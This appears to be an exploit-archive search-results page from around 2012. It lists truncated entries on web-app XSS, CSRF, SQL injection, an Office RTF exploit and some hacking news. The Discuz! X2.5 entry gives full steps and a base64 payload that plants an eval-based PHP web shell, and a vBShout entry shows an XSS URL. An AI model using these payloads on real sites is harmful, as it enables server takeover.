7736 matches found
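Discuz! X2.5 Remote Code Execution Vulnerability
No description provided by source. 1. Register any account 2. Log in as the user and publish a blog entry (note: it must be a blog entry) 3. Add an image, choose a network image, with the address $fputsfopenbase64decodeZGVtby5waHA,w,base64decodePD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw 4. Visit the blog entry; demo.php is generated in the forum root directory, one-line backdoor password C...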
eFront CMS 3.6.10 Information Disclosure
TITLE ....... eFront 3.6.10 CMS Information Disclosure bug DATE ........ 11.04.2012 public, after week or sth AUTHOR ...... http://hauntit.blogspot.com SOFT LINK ... http:// VERSION ..... 3.6.10 TESTED ON ... LAMP ----------------------------------------------------------------------- 1. What is...
HelpDen Cross Site Scripting
Exploit Title: HelpDen Cross Site Scripting Date: 15.04.2012 Author: Sony Software Link: http://www.helpden.com/ Google Dorks:inurl:.helpden.com/leavemessage.php?code Web Browser : Mozilla Firefox Blog : http://st2tea.blogspot.com PoC:...
Microsoft Office 2008 SP0 (Mac) - RTF pFragments
Microsoft Office 2008 SP0 Mac - RTF pFragments RTF Pfragments exploit for MAC office 2008 Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Advanced Hacking Trainings - http://training.aslitsecurity.com Web - http://www.aslitsecurity.com/ Blog -...
Banking System Vulnerability - 3 million bank accounts hacked in Iran
Banking System Vulnerability - 3 million bank accounts hacked in Iran Iran's Central Bank has announced that the electronic information of 3 million customers of 10 Iranian banks has been compromised. These banks now require their customers to change their ATM PIN numbers before they can access...
idev-Blog 1.0 Cross Site Request Forgery
Exploit Title: idev-Blog 1.0 CSRF Author: Jonturk75 Vendor or Software Link: http://idevspot.com/ Category:: webapps Demo : http://idevspot.com/demos/idev-blog/admin/ Greetz: Inj3ct0r Exploit DataBase 1337day.com...
idev-Blog 1.0 CSRF Vulnerability
Exploit for php platform in category web applications...
Validate.icq.com Cross Site Scripting
Date: 25.03.2012 Author: Sony and Flexxpoint Web Browser : Mozilla Firefox Sony Blog: http://st2tea.blogspot.com Flexxpoint Blog: http://flexxpoint.blogspot.com/ .................................................................. Good Place for XSS...
vBulletin vBShout 6.0.5 Cross Site Scripting
Title: vBulletin vBShout Module &username=&hours=&frommonth=0&fromday=&fromyear =0&endmonth=0&endday=&endyear=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1 http://www.site.com/vbshout.php?message="&s=&do=archive&instanceid=1 vBShout is the ideal way to keep members on your foru...
Z-BLOG V1.8 cmd.asp Cross-Site Scripting Vulnerability
No description provided by source...
Bo-Blog 2.1.0 go.php File Inclusion Vulnerability
No description provided by source...
Volusion Chat Cross Site Scripting
Exploit Title: Volusion Chat Cross Site Scripting Date: 15.03.2012 Author: Sony Software Link: http://www.volusion.com/ Google Dorks: inurl:livechat.aspx?ID= intext:volusion or intext:powered by volusion Web Browser : Mozilla Firefox Blog : http://st2tea.blogspot.com PoC:...
NTG Haber Yazilim 1 SQL Injection
Exploit Title; NTG Haber Yazilim v1 - SQL Injection Vulnerability Date ; 14/03/12 Author ; 3spi0n Script Vendor ; www.netgenel.net/index/1/ntg-haber-yazilimi-v1.html Script Demo ; http://www.netgenel.net/v1/anasayfa.php Category ; Webapps Type ; Sql Injection Tested on ; Ubuntu / Win7 Script...
Pop star KE$HA twitter Hacked
Pop star KE$HA twitter Hacked Pop star KE$HA has fallen victim to internet pranksters after her Twitter.com blog was hacked on Sunday. Tweet by her account: "Single out in a couple hours. Ugh so fkin stressful… wish I could stay on da the beach forever." It was potentially seen by Kesha's 3.1...
Adobe Flash Player MP4 'cprt' Overflow
This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt .mp4 file loaded by Flash, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the "Iran's Oil and Nuclear...
Google Releases Chrome 17.0.963.65
Google has released Chrome 17.0.963.65 for Linux, Macintosh, Windows, and Google Chrome Frame to address multiple vulnerabilities. These vulnerabilities may allow an attacker to execute arbitrary code or cause a denial-of-service condition. US-CERT encourages users and administrators to review th...
EditMe Cross Site Scripting
Exploit Title: EditMe Cross Site Scripting Date: 4.03.2012 Author: Sony Software Link: http://www.editme.com/ Web Browser : Mozilla Firefox Blog : http://st2tea.blogspot.com PoC: http://st2tea.blogspot.com/2012/03/editme-cross-site-scripting.html...
[SECURITY] [DSA 2423-1] movabletype-opensource security update
------------------------------------------------------------------------- Debian Security Advisory DSA-2423-1 [email protected] http://www.debian.org/security/ Florian Weimer March 02, 2012 http://www.debian.org/security/faq -...
Livejournal.com Cross Site Scripting
Exploit Title: Livejournal.com Cross Site Scripting Date: 27.02.2012 Author: Sony Software Link: http://www.livejournal.com/ Web Browser : Mozilla Firefox Blog : http://st2tea.blogspot.com PoC: http://st2tea.blogspot.com/2012/02/livejournalcom-cross-site-scripting.html...
Mozilla Firefox 4.0.1 Integer Overflow
function hex(x) { var y = x.toString(16); y = "0x" + y; return y; }
function itoa(i) { return String.fromCharCode(i); }
// n - length in bytes (1 unicode char = 2 bytes)
function puff(x, n) { while (x.length < n) x += x; return x.substring(0, n); }
function arr2hex(tab) { var s = ""; for (var i in tab) { x = tab[i]; x = x.toString(16);...